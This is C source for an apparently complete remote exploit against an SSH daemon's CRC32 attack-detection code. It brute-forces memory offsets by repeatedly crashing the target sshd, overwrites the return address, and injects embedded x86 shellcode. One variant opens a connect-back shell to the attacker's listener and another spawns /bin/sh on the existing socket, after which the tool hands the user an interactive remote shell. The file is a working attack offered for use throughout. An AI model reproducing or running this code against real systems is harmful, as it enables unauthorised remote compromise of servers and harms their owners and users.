/*
 *
 */

#include <stdio.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <arpa/inet.h>
#include <stdlib.h>

#include "7350brute.h"
#include "report.h"
#include "communicate.h"
#include "ssh-extern.h"

typedef unsigned long int word32;

extern int verbose_level;
int offset_grab = 0;

unsigned char *buf = NULL;
word32 SZ_BUF = 90*1024;

typedef enum {BP_START, BP_H_BUF_DIFF_TRY, BP_H_BUF_DIFF_EXACT, 
	      BP_H_BUF_DIFF_EXACT_TEST, BP_BUF, BP_STACK_DIST, BP_STACK_DIST_EXACT, 
              BP_RET_ADDR, BP_EXPLOIT, BP_EXIT_NOW } brute_phase;
typedef enum {BT_SSH = 0, BT_BIG = 1} brute_target;
/*
 XXX should contain pointer to shellcode 
 */
struct target {
	char *name;
	word32 	h_low;
	word32	h_high;
	word32  dist_low;
	word32  dist_high;
	word32	buf_low;
	word32	buf_high;
	word32  ret_dist;
	word32  ret_val;  
	brute_target target_type;
};

struct brute_result {
	/* which brute_phase are we in */
	brute_phase brute_phase;	
	word32 h_buf_diff_try;
	word32 h_buf_diff;
	word32 stack_dist;
	word32 buf;
	word32 h;
	int xp_tries;
	unsigned char xp_connip[4];
	unsigned short int xp_connport;
} br;

struct target *target = NULL;


/* XXX Yeah this sucks and will be changed later */
#define BR_H_HIGH	(target->h_high)
#define BR_H_LOW  	(target->h_low)
#define BR_BUF		(target->buf_high)
#define BR_BUF_HIGH	(target->buf_high)
#define BR_BUF_LOW	(target->buf_low)
#define BR_DIFF_LOW	(target->dist_low)
#define BR_DIFF_HIGH	(target->dist_high)
#define BR_BUF_STEP	(0x00001000)	/* 4096 == page size */
#define BR_STACK_TOP	(0xc0000000 - 0x04)
#define BR_TT		(target->target_type)

/* original high word of return address */
#define BR_RET_VAL		(target->ret_val)
/* distance from remote_version to ret_addr */
#define BR_RET_DIST	(target->ret_dist)
#define TARGET_FILE	"targets"


void target_func(int targ_num)
{
	FILE *stream;
	int i = 0;	
	static struct target targ;
	char line[1024];
	
	if ((stream = fopen(TARGET_FILE, "r")) == NULL) {
		fatal("Can't open: %s\n", TARGET_FILE);
	}
	targ.name = malloc(100);
	if (targ_num == 0) {
		dump("Targets:\n");
	}
	while (fgets(line, sizeof(line), stream)) {
		if (line[0] == '#') continue;
		if ( sscanf(line, "%[^,\n],0x%lx,0x%lx,0x%lx,0x%lx,0x%lx,0x%lx,"
		                    "0x%lx,0x%lx,%d", targ.name, 
				    &(targ.h_low), &(targ.h_high),
				    &(targ.dist_low), &(targ.dist_high),
				    &(targ.buf_low), &(targ.buf_high),
				    &(targ.ret_dist), &(targ.ret_val),
				    (int *) &(targ.target_type)) == 10) {
			i++;
			if ((targ.dist_low % 8) != 4)
				dump("Warning: Distlow incorrect\n");
			if ((targ.ret_dist % 4) != 2)
				dump("Warning: ret_dist incorrect\n");
			if (targ_num == 0) 
				dump("(%2d)\t%s\n", i , targ.name);
			else if (targ_num == i){
				dump("Target: %s\n\n", targ.name);
				target = &targ;
				break;
			}
		} else {
			error("Wrong line in targets file\n");
		}
	}
	fclose(stream);
	if ((target == NULL) && (targ_num != 0)) {
		dump("Target %d not in list\n", targ_num);	
		free(targ.name);
		target_func(0);
	} else if (targ_num == 0) {
		free(targ.name);
		exit(EXIT_FAILURE);
	}
}

#define CR_EOF 0
#define CR_CRASH 0
#define CR_TIMEOUT -1
#define CR_NOCRASH 1
/* XXX linux specific, tv.tv_secs isn't decreased on other platform */

int crashed(int fd, int secs)
{
	char tmp[1];
	fd_set fds;
	struct timeval tv;
	int n;
	
//	unblock_socket(fd);
	tv.tv_sec = secs;
	tv.tv_usec = 0;
	while (tv.tv_sec) {
		FD_ZERO(&fds);
		FD_SET(fd, &fds);
		select(fd + 1, &fds, NULL, NULL, &tv);
		if (!FD_ISSET(fd, &fds))
			return CR_TIMEOUT;
		n = read(fd, tmp, 1);
		if (n <= 0)
		/* connection closed, probably because of SEGV */
			return CR_EOF;
		if (n > 0)
		/* means ..._disconnect was called */
			return CR_NOCRASH;
	}
	/* it takes a long time (most likely still running */
	return CR_TIMEOUT;
}

int crash_time = 5;


#ifdef BACK_CONNECT
/* places shellcode in the buffer whose end is buf_end */
/* 
 smiler/teso shellcode, even slicable in 2 byte chunks but that's not needed 
 */
/*
 XXX should het from still to come target->shellcode pointer
 */
void set_shellcode(unsigned char *buf_end)
{
	unsigned int	scode_len = 178;
	unsigned char	scode[] =
/* 0 */		"\xb2\xbf\xb6\xff\x0f\xca\xb2\x00\xb6\xf5\x89\xd4"
/* 12 */	"\x31\xc0\xb0\x66\x31\xdb\xfe\xc3\x6a\x00\x6a\x01"
/* 24 */	"\x6a\x02\x89\xe1\xcd\x80\x89\xc7\x89\xd4\x6a\x00"
/* 36 */	"\x6a\x00\xb3\x01\xb7\x00\x0f\xcb\xb7\x00\xb3\x7f"
//			       44      33              22      11
/* 48 */	"\x53\x90\x31\xdb\xb3\x0a\xb7\x0a\x66\x53\x0f\xcb"
//				       p1      p2
		"\xfe\xc3\xfe\xc3\x66\x53\x89\xe3\x6a\x10\x53\x90"
		"\x50\x90\x89\xe1\x31\xc0\x31\xdb\xb3\x03\xb0\x66"
		"\xcd\x80\x89\xfb\x31\xc9\xb1\x02\x31\xc0\xb0\x3f"
		"\xcd\x80\xfe\xc9\x31\xc0\xb0\x3f\xcd\x80\xfe\xc9"
		"\x31\xc0\xb0\x3f\xcd\x80\x6a\x00\x6a\x00\xb2\x00"
		"\xb6\x68\x0f\xca\xb6\x73\xb2\x2f\x52\x90\xb2\x6e"
		"\xb6\x69\x0f\xca\xb6\x62\xb2\x2f\x52\x90\x89\xe1"
		"\x31\xc0\xb0\x08\x01\xc1\x89\xe2\xb0\x0c\x01\xc2"
		"\x89\x21\x89\xe3\x31\xc0\xb0\x0b\xcd\x80\x31\xc0"
		"\xfe\xc0\xcd\x80\x31\xc0\xfe\xc0\xcd\x80";

	/* where to store the back-connect ip address */
	unsigned int	ip_ofs[4] = { 47, 45, 41, 39 };
	unsigned int	port_ofs[2] = { 53, 55 };

	scode[ip_ofs[0]] = (unsigned char) br.xp_connip[0];
	scode[ip_ofs[1]] = (unsigned char) br.xp_connip[1];
	scode[ip_ofs[2]] = (unsigned char) br.xp_connip[2];
	scode[ip_ofs[3]] = (unsigned char) br.xp_connip[3];
	scode[port_ofs[0]] = (unsigned char) ((br.xp_connport >> 8) & 0xff);
	scode[port_ofs[1]] = (unsigned char) (br.xp_connport & 0xff);

	memcpy(buf_end - scode_len, scode, scode_len);
	return;
}
#else
void set_shellcode(unsigned char *buf_end)
{
	unsigned char scode[] = 
	"\x31\xdb\xb3\x07\x89\xe2\x6a\x10\x89\xe1\x51\x52\x68\xfe\x00\x00\x00\x89\xe1\x31\xc0\xb0\x66\xcd\x80\xa8\xff\x74\x0b\x5a\xf6\xc2\xff\x74\x4e\xfe\xca\x52\xeb\xeb\x5b\x31\xc9\xb1\x03\xfe\xc9\x31\xc0\xb0\x3f\xcd\x80\x67\xe3\x02\xeb\xf3\x6a\x04\x6a\x00\x6a\x12\x6a\x01\x53\xb8\x66\x00\x00\x00\xbb\x0e\x00\x00\x00\x89\xe1\xcd\x80\x6a\x00\x6a\x00\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x8d\x4c\x24\x08\x8d\x54\x24\x0c\x89\x21\x89\xe3\x31\xc0\xb0\x0b\xcd\x80\x31\xc0\xfe\xc0\xcd\x80";

	memcpy(buf_end - sizeof(scode), scode, sizeof(scode));
}

#endif

#ifdef BACKCONNECT
int exploit_setup_listener(int ifd)
{
	int sin_len;
	struct sockaddr_in sin;
	int i;
	int fd;

	sin_len = sizeof(sin);
	if (getsockname(ifd, &sin, &sin_len) < 0) {
		dump("Can't determine local address: %s\n", strerror(errno));
		dump("I hope you are not using connect back shellcode ..\n");
		return -1;
	}
	/* XXX endian ness */
	for (i = 0; i < 4; i++) {
		br.xp_connip[i] = (sin.sin_addr.s_addr >> (i * 8)) & 0xff;
	}

	if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
		dump("socket failed: %s\n", strerror(errno));
		dump("I hope you are not using connect back shellcode ..\n");
		return -1;
	}
	
	for (i = 7350; i < 7360; i++) {
		sin.sin_port = htons(i);
		if (!bind(fd, &sin, sin_len)) break;
	}

	if (i == 7360) {
		sock_close(fd);
		dump("Couldn't bind socket\n");
		dump("I hope you are not using connect back shellcode ..\n");
		return -1;
	}

	br.xp_connport = i;
	listen(fd, 1);

	dump("Letting shellcode back connect at: %s:%d\n", 
	      inet_ntoa(sin.sin_addr), i);

	return fd;
}
#endif

void exploit_get_shell(int lfd)
{
	int fd;
	struct sockaddr_in sin;
	fd_set fds;
	int len;
	char initial[] = "echo; echo '***** YOU ARE IN *****'; echo ; hostname ; uname -a; id\n";

#ifdef BACK_CONNECT
	int sin_len = sizeof(sin);

	fd = accept(lfd, &sin, &sin_len);
	sock_close(lfd);
	if (fd < 0) {
		fatal("No connection recieved .. \n");
	}
	dump("Connection from: %s:%d\n", inet_ntoa(sin.sin_addr), htons(sin.sin_port));
#else
	fd = lfd;
#endif
	write(fd, initial, strlen(initial));	
	while (1) {
		FD_ZERO(&fds);
		FD_SET(fd, &fds);
		FD_SET(0, &fds);
		select(fd + 1, &fds, NULL, NULL, NULL); 
		if (FD_ISSET(0, &fds)) {
			len = read(0, buf, 4096);
			if (len < 0) {
				dump("stdin < 0 ??\n");
				break;
			}
			write(fd, buf, len);
		}
		if (FD_ISSET(fd, &fds)) {
			len = read(fd, buf, 4096);
			if (len == 0) {
				dump("Connection closed\n");
				break;
			}
			if (len < 0) {
				dump("error while reading from remote host\n");
				break;
			}
			write(1, buf, len);
		}
	}	
	sock_close(fd);
	return;
}

/*
 Small routine that verifies if a certain value is indeed at addr

 Problem:
 
 a NULL is very common so it is possible that a NULL is detected in
 stead of the expected value, the remote sshd won't crash then.

 It won't crash as long as you have a to low address and all the values
 contained therein are such that buf + h[i] * 8 is addressable.

 To test this one needs to check the address above the original address
 and above that and above that etc.

 This offcourse only makes sense if there is some 'illegal' value 
 after the expected value which is before the next occurence of the 
 expected value.

 In fact this isn't even a problem, if we hit some random space that
 contains 0's up till the expected value everything will still work
 out fine since those 0's will also be there when we change the address
 */
int brute_verify(word32 addr_diff, word32 value)
{
	int fd;

	fd = start_session();
	xp_construct_brute_exact(buf, SZ_BUF, br.h_buf_diff);
	PUT_32BIT(buf + value * 8, (addr_diff) / 2);
	dump("(%-02d) ", ++br.xp_tries);
	dump("is 0x%04x at distance: 0x%08lx # ", value, addr_diff);
	raw_send_packet(buf, SZ_BUF, fd);
	if (crashed(fd, crash_time) == CR_CRASH) {
		dump("NO #\n");
		sock_close(fd);
		return 0;
	}
	dump("YES #\n");
	sock_close(fd);
	return 1;
}

/*
 Finds the exact location of the ret_addr, based on:
 ret_addr + buf + buf_len (SZ_BUF)
 
 stack looks like :
 
 easiest is changing SZ_BUF such that lsw buf_len is illegal
 then check ret (since lsw ret can easily be made illegal)
 if it doesn't crash check msw buf_len;
 lsw ret|msw ret|lsw buf|msw buf|lsw buf_len|msw buf_len|

 on big endian everything is swapped but we could then check for 
 the NULL IV pointer which is after lsw buf_len then which we can 
 make illegal

 br.stack_dist might be off by 8 bytes ( to low)

 lsw sfp | msw sfp | lsw ret| msw ret | lsw buf | msw buf | lsw len | msw len | 0 | 0
 */
void brute_return_addr(void)
{
#ifdef BACK_CONNECT
	word32 ret_guess = br.stack_dist - BR_RET_DIST;
	static int i = 0;
	int ret_ok = 0;
#else
	static int add = 0;
#endif
#ifdef BACK_CONNECT
while (!ret_ok) {
	do {
		i++;
		if (i & 1)
			ret_guess = br.stack_dist - BR_RET_DIST + (i >> 1) * 2;
		else
			ret_guess = br.stack_dist - BR_RET_DIST - (i >> 1) * 2;
	} while (!brute_verify(ret_guess, BR_RET_VAL));

	if (!brute_verify(ret_guess + 8, SZ_BUF >> 16)) {
		dump("not the correct one searching on\n");
	} else 
		ret_ok++;
}
	BR_RET_DIST = br.stack_dist - ret_guess;
	br.brute_phase = BP_EXPLOIT;
	return;
#else
	/* can just as well exploit immediatly takes only one packet */
	if (add == 0) {
		add = 4;
	} else {
		BR_RET_DIST += add;
		if (add > 0) 
			add = (-add) - 4;
		else
			add = (-add) + 4;
	}
/*
	if (i & 1)
		ret_guess = br.stack_dist - BR_RET_DIST + (i >> 1) * 4;
	else
		ret_guess = br.stack_dist - BR_RET_DIST - (i >> 1) * 4;
	BR_RET_DIST = br.stack_dist - ret_guess;
*/
	br.brute_phase = BP_EXPLOIT;
	return;
#endif
}

void brute_offset_grab(void)
{
	int fd;

	fd = start_session();
	memset(buf, 0x41, SZ_BUF);

	dump("OFFSET GRAB\n");
	dump("ATTACH NOW"); getchar();
	raw_send_packet(buf, SZ_BUF, fd);

	dump("now in gdb\n");
	dump("x /hx -$ebp - 6 + ((int)h + 0x%08lx)\n", br.stack_dist);
	dump("the value in front of the : is the ret_dist\n");
	dump("x /hx $ebp + 6\n");
	dump("the value after the : is the ret_val\n");
	sock_close(fd);
	exit(EXIT_SUCCESS);
}

/*
 Sets up a set of blocks that will trigger DEATTACK_DETECTED
 the first block that is the same is block block_num
 */
void setup_deattack_detected(int block_num)
{
	int i;
	/* here we build the portion that will trigger DEATTACK_DETECTED */	
	/* let the next block point to the last half of that block */
	PUT_32BIT(buf + (block_num)*8, 
	         (br.h_buf_diff + 4 + (block_num)*8)/2);
	/* and put the block number in there so that they will compare it
	   to it self */
	PUT_16BIT(buf + 4 + (block_num)*8, htons(block_num));

	#define MAGIC_VAL 0x12477cdf
        for (i = 0; i < 32; i++) {
                if (!(MAGIC_VAL & (1 << i))) {
		/* make it the same block */
			memcpy(buf + (block_num+1+i)*8, 
			       buf + (block_num)*8, 8);
                }
        }
}

int brute_exploit(void)
{
	/* real exploitation .. */
	/* we overwrite the return address with an address in 
	   our buffer ( at least 64K before the end)
			
	   we need to get detect_attack to return early,
	   since we don't know the lsw of the ret_addr
	   this can be done by changing buf so that
	   c < buf + len no longer counts

	   since this must be done after the msw of the ret
	   addr has been set we have to change j first
	   (else we will increase buf which is not what we
	   want)

	   although c is declared as register it is placed
	   on the stack meaning we can manipulate it, which
	   is easier to do then first manipulate j then len

	   on certain compilation the above isn't true therefor
	   we go with the "DEATTACK_DETECTED" approach.
	 */

	/* extra big buffer .. */
	int SZ_BUF_X;
	int fd, lfd;
	word32 buf_high_new;
	int round = 0;
	int i;
	static frun = 0;


#if 0
	if (BR_TT == BT_BIG) {
		SZ_BUF_X = 250*1024;	
	} else {
		SZ_BUF_X = 120*1024;
	}
#endif
	SZ_BUF_X = SZ_BUF;
	dump("EX: buf: 0x%08lx h: 0x%08lx ret-dist: 0x%08lx\n", br.buf, br.buf - br.h_buf_diff, br.stack_dist - BR_RET_DIST);

	fd = start_session();
#ifdef BACK_CONNECT
	lfd = exploit_setup_listener(fd);
#endif
#if 1
	if (frun++ == 0) {
		dump("ATTACH NOW\n");
		getchar();
	}
#endif

small_again:
	xp_construct_brute_exact(buf, SZ_BUF_X, br.h_buf_diff);

	/* this makes a valid compare block for later */
	PUT_32BIT(buf + BR_RET_VAL*8, (br.stack_dist - BR_RET_DIST) / 2);

	/* change return address */
	
	if (BR_TT == BT_BIG) {
		buf_high_new = (br.buf >> 16) + 2 + round;
	} else {
		buf_high_new = 0xbfff - (br.stack_dist >> 16) + 
		               round + (br.h_buf_diff >> 16);
	}
	dump("Changing MSW of return address to: 0x%04x\n", buf_high_new);
	PUT_32BIT(buf + buf_high_new*8, (br.stack_dist - BR_RET_DIST) / 2);

	
	/* set up shellcode */
	memset(buf + (buf_high_new+1)*8, 0x90, SZ_BUF_X - (buf_high_new+1)*8);
	set_shellcode(buf+SZ_BUF_X);

	setup_deattack_detected(buf_high_new+1);

 
	raw_send_packet(buf, SZ_BUF_X, fd);
#ifdef BACK_CONNECT
	sock_close(fd);
	if (lfd < 0) {
		fatal("No listen socket found .. exploit might work but you won't know\n");
	}
#else
	/* These 10 seconds suck really big time but wtf */
	if (crashed(fd, 2) == CR_TIMEOUT) {
		fd_set fds;
		struct timeval tv;
		char lbuf[200];
		char provoke[] = "echo CHRIS CHRIS\n";

		dump("No Crash, might have worked\n");
		tv.tv_sec = crash_time;
		tv.tv_usec = 0;
		FD_ZERO(&fds);
		FD_SET(fd, &fds);
		/* possible shell */

		write(fd, provoke, strlen(provoke));
		select(fd + 1, &fds, NULL, NULL, &tv);
		if (FD_ISSET(fd, &fds)) {
			i = read(fd, lbuf, sizeof(lbuf) - 1);
		}
		if (i > 0) {
			lbuf[i] = 0;
			dump("Reply from remote: %s\n", lbuf);
			if (strstr(lbuf, "CHRIS")) {
				exploit_get_shell(fd);
				return 0;
			} else 
				dump("No Chris not found and since we can't live without her .. searching on \n");
		} else {
			dump("error on read, continuing\n");
		}
	} else {
		dump("Crash, finding next return address\n");
	}
	sock_close(fd);
#endif
	if (!round++) {
		fd = start_session();
		goto small_again;
		
	}
#ifdef BACK_CONNECT
	exploit_get_shell(lfd);
#else
	/* find next possible pair */
	brute_return_addr();
#endif
	/* exploit failed */
	return -1;
}

/*
 brutes the distance between buf and h, using the teso method, 
 and in fact also using there code thanks.
 we only look for distance, but teso looked for specific buf 
 which gives to variables all the time, we had better to the same ;)
 */

void brute_h_buf_diff_try(void)
{
	int fd;
	word32 dist = BR_DIFF_LOW;

	/* finds a guess to h - buf */
	/* XXX try more likely value first */
	/* XXX stop condition ? */
	dump("Finding h - buf distance (estimate)\n");
	while (1) {
		dump("(%-02d) ", ++br.xp_tries);
		dump("testing 0x%08lx # ", dist);
		xp_construct_brute(buf, SZ_BUF, dist);
		fd = start_session();
		raw_send_packet(buf, SZ_BUF, fd);
		if (crashed(fd, crash_time) == CR_CRASH) {
			dist = dist + (SZ_BUF >> 1);
			dump("SEGV #\n");
		} else {
			dump("FOUND #\nFound buffer, determining exact diff\n");
			br.brute_phase = BP_H_BUF_DIFF_EXACT;
			br.h_buf_diff_try = dist;
			sock_close(fd);
			return;
		}
		sock_close(fd);
	}
}

void brute_h_buf_diff_exact(void)
{
	int fd;
	int i;
	word32 br_h_slider ;
	word32 br_h = BR_BUF - br.h_buf_diff_try;
	word32 br_t_l;

	br_h_slider = 1;
	while (SZ_BUF > br_h_slider) br_h_slider <<= 1;
	br_h_slider >>= 1;
	br_t_l = br_h + br_h_slider;

	br_h_slider = (br_h_slider >> 1) & (~7);

	dump("Finding h - buf distance using the teso method\n");
	while (br_h_slider) {
		 /* works, saved about 10-14 packets */
		fd = start_session();
		dump("(%-02d) ", ++br.xp_tries);
		dump("binary-search: h: 0x%08lx, slider: 0x%08lx # ", br_t_l - br_h_slider , br_h_slider);	
		xp_construct_brute(buf, SZ_BUF, BR_BUF - (br_t_l - br_h_slider));
		raw_send_packet(buf, SZ_BUF, fd);
		if ((i = crashed(fd, crash_time)) == CR_CRASH) {
			/* br_t_l to high */
			dump("SEGV #\n");
			br_t_l -= br_h_slider;
		} else {
			dump("SURVIVED #\n");
			br_h = br_t_l - br_h_slider;
		}
		if (br_h_slider == 0x8) 
			br_h_slider = 0;
		br_h_slider >>= 1;
		/* Don't round down */
		while (br_h_slider & 7) br_h_slider++;	
		sock_close(fd);
	}
	dump("Bin search done, testing result\n");
	br.brute_phase = BP_H_BUF_DIFF_EXACT_TEST;
	br.h_buf_diff = BR_BUF - br_h;
}

/*
 is this still needed ?
 */
void brute_h_buf_diff_exact_test(void)
{
	int fd;
	int i = 0;
	word32 br_h = BR_BUF - br.h_buf_diff;

	dump("Finding exact h - buf distance\n");
	while (i++ < 4) {
		dump("(%-02d) ", ++br.xp_tries);
		dump("trying: 0x%08lx # ", br_h);
		xp_construct_brute_exact(buf, SZ_BUF, BR_BUF - br_h);
		fd = start_session();
		raw_send_packet(buf, SZ_BUF, fd);
			
		if (crashed(fd, crash_time) == CR_CRASH) {
			dump("SEGV #\n");
			br_h += 0x08;
		} else {
			dump("SURVIVED #\nExact match found at: 0x%08lx\n", 
			      BR_BUF - br_h);
			dump("Looking for exact buffer address\n");
			br.brute_phase = BP_BUF;
			br.h_buf_diff = BR_BUF - br_h;
			sock_close(fd);
			return;
		}
		sock_close(fd);
	}
	fatal("Exact h - buf difference not found. aborting\n");
}

void brute_buf(void)
{
	int fd;
	/* the stack is 0x4000 big so we can get 2 non crashes this way */
	int round = 0;
	int i;

	if (BR_TT == BT_BIG) {
		br.buf = ((BR_H_LOW + br.h_buf_diff) & ~0xfff) + 0xc;
		if (br.buf < BR_BUF_LOW) 
			br.buf = BR_BUF_LOW;
	} else {
		br.buf = BR_H_LOW + br.h_buf_diff;
	}

	/* XXX stop condition */
	dump("Finding exact buffer address\n");
	while (br.buf < BR_BUF_HIGH) {
		dump("(%-02d) ", ++br.xp_tries);
		dump("Trying: 0x%08lx # ", br.buf);
		fd = start_session();
		xp_construct_brute_exact(buf, SZ_BUF, br.h_buf_diff);
		PUT_32BIT(buf, (br.h_buf_diff + BR_STACK_TOP - br.buf) / 2);	
		for (i = 0; i < SZ_BUF; i+=8)
			memcpy(buf + i, buf, 8);
		setup_deattack_detected(1);	
		raw_send_packet(buf, SZ_BUF, fd);
		if (crashed(fd, crash_time) == CR_CRASH) { 
			dump("SEGV #\n");
			br.buf += 0x1000;
			sock_close(fd);
			continue;
		} 
		sock_close(fd);
		dump("SURVIVED #\n");
		br.brute_phase = BP_STACK_DIST;
		if (BR_TT != BT_BIG) 
			br.buf = br.buf - 0x3000;
		return;
	}
	fatal("Correct buf address not found.\n");
}

/*
 This one brutes buf for OpenSSH, it can do so more effectively because
 it stores incoming packets on the stack first, setup 4 pointer into that data
 then a deattack_detect part then 0xffff's to not crash 
 we can walk all possibilities quickly because its a 8k buffer

 Theoretical problem: on slow links it is possible that all packets are read in
 smaller chunks that 8k which results in only part of buf being filled

 Extra possibility: smaller packets -> find this buffer -> find ret_addr B00M

 i think that is way fucking much better indeed, lets try ;)

 */
void brute_stack_dist(void)
{
	int fd;
	int i;
	int surv = 0;

	br.stack_dist = 0xc0000000 - (br.buf - br.h_buf_diff) - 7 * 1024;
	dump("Finding distance till stack buffer\n");
	while (1) {
		dump("(%-02d) ", ++br.xp_tries);
		dump("Trying: 0x%08lx # ", br.stack_dist);
		
		memset(buf, 0xfd, SZ_BUF);	
	
		for (i = 0; i < 10; i++) {
			PUT_32BIT(buf + i * 8, (br.stack_dist + i * 2) >> 1);
		}
		setup_deattack_detected(i);

		fd = start_session();

		/* 
		 Use special send so that only first 1024 bytes of buf are 
		 0xff
		 */
		/* start with 4 byte of crashing material, so that we can determine the start exact */
		memset(buf+SZ_BUF-1020, surv ? 0xfd : 0xff, 1020);
		raw_send_packet_spec(buf, SZ_BUF, fd, 1024);
		
		if (crashed(fd, crash_time) == CR_CRASH) {
			if (surv == 1) {
				dump("SEGV # OK\n");
				break;
			}
			dump("SEGV #\n");
			/* safe, could be 8k - (I32 + 10 + 1) * 8) */
			/* This doesn't work over an inet link which is
			   so slow the remote sshd won't get 8k, but more
			   something like the MTU or 1k (safe guess)
			 */
			br.stack_dist -= (1020 - 10 * 8);
		} else {
			if (surv == 1) {
				dump("SURVIVED # not the one\n");
				surv = 0;
				br.stack_dist -= (1020 - 10 * 8);
			} else {	
				dump("SURVIVED # verifying\n");
				surv = 1;
			}
		}
		sock_close(fd);
	}
	br.brute_phase = BP_STACK_DIST_EXACT;
	sock_close(fd);
}

/*
 stack:

 lsw sfp| msw sfp| lsw ret| msw ret| buffer
 sfp|ret addr|buffer
 sfp is sure to generate SEGV (0xbfff -> SEGV)

 the rest can't really be tested so but might be off by 8

 keep this in mind when testing for ret_addr location
 */

void brute_stack_dist_exact(void)
{
	int fd;
	int i = 0;
	word32 slider = 1024 / 2;

	dump("Finding exact h - stack_buf distance\n");
	while (slider > 1) {
		dump("(%-02d) ", ++br.xp_tries);
		dump("trying: 0x%08lx  slider: 0x%04x# ", br.stack_dist - slider, slider );

		memset(buf, 0xfd, SZ_BUF);
		for (i = 0; i < 256; i++) 
			PUT_32BIT(buf + i * 8, (br.stack_dist - slider + i * 2) >> 1);

		setup_deattack_detected(i);
		fd = start_session();
		memset(buf+SZ_BUF-1020, 0xff, 1020);
		raw_send_packet_spec(buf, SZ_BUF, fd, 1024);
			
		if (crashed(fd, crash_time) == CR_CRASH) {
			dump("SEGV #\n");
		} else {
			dump("SURVIVED #\n"); 
			br.stack_dist -= slider;
		}
		sock_close(fd);
		slider /= 2;
	}
	sock_close(fd);
	dump("Final stack_dist: 0x%08lx\n", br.stack_dist);
	br.brute_phase = BP_RET_ADDR;	
};


void brute(void)
{
	while (1) {
		switch (br.brute_phase) {
		case BP_START:
			br.brute_phase = BP_H_BUF_DIFF_TRY;
			break;
		case BP_H_BUF_DIFF_TRY:	
			brute_h_buf_diff_try();
			break;
		case BP_H_BUF_DIFF_EXACT: /* experimental binary search */
			brute_h_buf_diff_exact();
			break;
		case BP_H_BUF_DIFF_EXACT_TEST:
			brute_h_buf_diff_exact_test();
			break;
		case BP_BUF:
			brute_buf();
			break;
		case BP_STACK_DIST:
			brute_stack_dist();
			break;
		case BP_STACK_DIST_EXACT:
			brute_stack_dist_exact();
			break;
		case BP_RET_ADDR:
			if (offset_grab) {
				brute_offset_grab();
				break;
			}
			brute_return_addr();
			break;
		case BP_EXPLOIT:
			if (brute_exploit() == 0)
				exit(EXIT_SUCCESS);
			break;
		case BP_EXIT_NOW:
			exit(EXIT_SUCCESS);
			break;
		}
	}
}

void skip_steps(char * Xdata)
{
#if 0
	if (sscanf(Xdata, "0x%08lx 0x%08lx 0x%08lx", 
	           &br.h, &br.buf, &br.rv) != 3){
		dump("Can't parse Xdata, continueing with normal run.\n");
		return;
	}
#endif
	br.brute_phase = BP_EXPLOIT;

	brute();
}

void usage() {
	dump("Usage: sshd-exploit -t# <options> host [port]\n");
	dump("Options:\n");
	dump("\t-t num (mandatory)  defines target, use 0 for target list\n");
	dump("\t-X string           skips certain stages\n");
	exit(EXIT_FAILURE);
}

int main(int argc, char *argv[])
{
	int fd;
	int ch;
	int i;
	char *Xdata = NULL;

	dump("SSHD deattack exploit. (c) D + S from T\n\n");
	while ((ch = getopt(argc, argv, "Tht:X:")) != EOF) {
		switch (ch) {
			case 't':
				target_func(atoi(optarg));
				break;
			case 'X':
				Xdata = optarg;
				break;
			case 'T':
				dump("Offset grabbing\n");
				offset_grab++;
				break;
				
			case 'h':
			default:
				usage();
		}
	}
	if (target == NULL) {
		error("No target specified\n");
		usage();
	}
	argc -= optind;
	argv += optind;
	if (argc == 2) {
		host = argv[0];
		port = atoi(argv[1]);
	} else if (argc == 1){
		host = argv[0];
		port = 22;
	} else {
		error("No host specified\n");
		usage();
	}

	/* both such that SZ_BUF & 0xffff gives crashing value for h[i] */
	if (BR_TT == BT_BIG) 
		SZ_BUF = 230 * 1024;
	else
		SZ_BUF = 100 * 1024;


	dump("Attacking: %s:%d\n", host, port);
	buf = xmalloc(255*1024); 

	memset(&br, 0, sizeof(br));
	br.brute_phase = BP_START;

	sprintf(ident_string, "1.2.27");
	id_len = strlen(ident_string);

	if (Xdata) {
		skip_steps(Xdata);
	}

	fd = start_session();
	dump("Testing if remote sshd is vulnerable # ");
	memset(buf, 0x41, SZ_BUF);
	dump("ATTACH NOW");
	getchar();
	
	rtt = -time(NULL);
	raw_send_packet(buf, SZ_BUF, fd);
	if (crashed(fd, crash_time) != CR_CRASH) {
		sock_close(fd);
		fatal("NO #\n");
	}
	rtt += time(NULL); 
	if (rtt) rtt *= 2;
	else rtt = 2;
	dump("YES #\n");
	brute();

	xfree(buf);
	
	return 0;
}
